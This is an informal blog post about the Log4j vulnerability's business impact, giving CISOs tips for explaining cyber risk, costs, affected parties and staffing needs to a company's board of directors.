So far this year, the Cybersecurity front seems to be, about
the same as it was last year. Of course
anything can happen right now, given that a Russian attack on Ukraine seems to
be more or less imminent.
Because of this, our own Federal Government has been putting
out news alerts about a huge escalation in the number of Cyberattacks that could
potentially originate from that area.
Fingers crossed, that nothing happens.
Trying not to get political here, but what the world needs right
now is peace, given what the Omicron variant has done so far to the world. But
last month, lots of attention and news headlines were spent on another major
hack, which probably had ramifications far worse than that of the Solar Winds
attack. What is this hack you may be
asking?
Well, it is the Log4j. Now, I don’t know all of the details about this
one, and I know it sounds bad on my part, but truthfully, I have not really
kept up to speed with what has been happening on this front.
Essentially, Log4j is a log recording tool which can be used
by both network administrators and end users alike. Here is a good, technical definition of it:
“Log4j records events – errors and routine system operations
– and communicates diagnostic messages about them to system administrators and
users. It’s open-source software provided by the Apache Software
Foundation.”
It consists of an Open-Source platform, and while the intent
of this is provide a tool to keep track of suspicious behavior, its very nature
allows it to be quite easily used in a malicious way by the Cyberattacker.
Because of this, there are many open backdoors in which the Cyberattacker
can penetrate through, and from there, deploy their malicious payloads in a simultaneous
fashion like how the Solar Winds hack occurred.
I will write another blog in the future that will cover more
about the technical nature of this hack, but the main purpose of tis one today
is the lack of communication that took place in Corporate America when it came
to notifying all of the impacted stakeholders.
This is especially true for the Board of Directors of any
company.
Many of these people that occupy this high perch still have
no idea of just how truly devastating a Cyberattack can be. In fact, according to a recent survey from
Gartner, 88% of all businesses in Corporate America still view Cybersecurity
just as a business risk.
They still do not take the holistic approach that it is also
a technological risk, which can have dire consequences for the entire company
they are in charge of leading.
More information about this study can be found on the link
below:
In fact, the Log4j hack had such a far-reaching impact that even
the Cybersecurity and Infrastructure Security Agency (also known as “CISA”) had
issued various bulletins on how to mitigate the risk and damage that it
posed.
Heck, even the FTC also just recently announced that it would
take legal action against those companies that did nothing to further protect the
PII datasets of employees and customers that could have been impacted by
it.
These messages were also targeted to the Board of Directors
in Corporate America, by pointing out directly that they could even be
criminally negligent if they don’t further steps to be more proactive about
Cybersecurity.
But unfortunately, explaining all of this to a Board of
Directors falls squarely on the shoulders of the CISO. And if they cannot do this in a succinct way,
then of course their jobs are in limbo.
So what can a CISO so to talk about the damage potential a hack like
Log4j can have on their company?
Here are some tips:
1)
Explain the entire picture:
In order for your Board of Directors
to get the complete of what is going on, you have to explain this to them in terms
that they can understand. For example,
mention all of the big-name IT vendors that have also been hit by this: Amazon Web Services, Oracle, Cisco, IBM,
Fortinet, VMware, Microsoft, etc. Hammer
down the point here that even despite the fact that these companies had probably
some of the best lines of defenses possible, they too became victims. The idea here is to point out that anybody
can be a victim, even your own company. So what is the point of waiting until you are
impacted to be proactive? Enunciate the importance
of doing this now.
2)
Break things down into dollars and cents:
Unfortunately the boards in
Corporate America only understand one thing: The bottom line. So in this regard, perhaps, you the CISO, should
work closely with the financial analysts in your company to actually break down
the dollar and cent cost of an impacted company (assuming that you can get those
numbers from somewhere), and from there, extrapolate those findings as to what the
potential financial loss could be to your company. This should get some ears perked up.
3)
Illustrate the picture of who all will be
impacted:
In a large-scale attack such as
this one, it is not just you, your employees and customers that are impacted. Keep in mind also your external third parties,
such as suppliers, will also be bear the brunt of the damage as well, because
they are making use of the PII datasets that you have provided them. Also tell your board that if they are
impacted, they will not be held legally responsible, rather, it is your company
that will be. Explain what this will
mean in terms of brand loss and reputational damage.
4)
The need for manpower:
Just about every IT Security team
imaginable is stretched well beyond their breaking points. There is simply not enough people around to
help detect and thwart off the looming threat variants that are out there. Explain to your board you need more people,
and that you desperately need the funding to do that. Tell them that you do not have get direct hires
(which of course will bring more cost to the company), even hiring contractors
will work just as well to (of course, after they have properly vetted). Heck, even tell them you can hire college
graduates with not much experience. This
will also help solve the problem of the huge employment gap that the Cyber
industry is faced with today.
My Thoughts On This:
In the end, in a large business setting, everything comes
from the top, and that is how all employees all the way down to your overnight cleaning
will act. Don’t blame the CISO for anything
and everything. In the end, the buck
stops with the Board of Directors, and the people who occupy these seats need
to act as such.
The time for these people who think that they have God like
powers has to stop here and now.
In the end, your Board of Directors are normal human beings,
just like you and me. They have no special or magical powers, maybe except for
the ego trip they get by being at the top.
But this all has to be put aside, and your Board of Directors must
understand that they have a huge stake in the Cybersecurity of your company as
well.
Once all of the ego checks have been put into place and the finger
pointing as has stopped, only then can Corporate America be truly on the road
path to instilling a proactive mindset which will transcend down all the way to
the employees.
No comments:
Post a Comment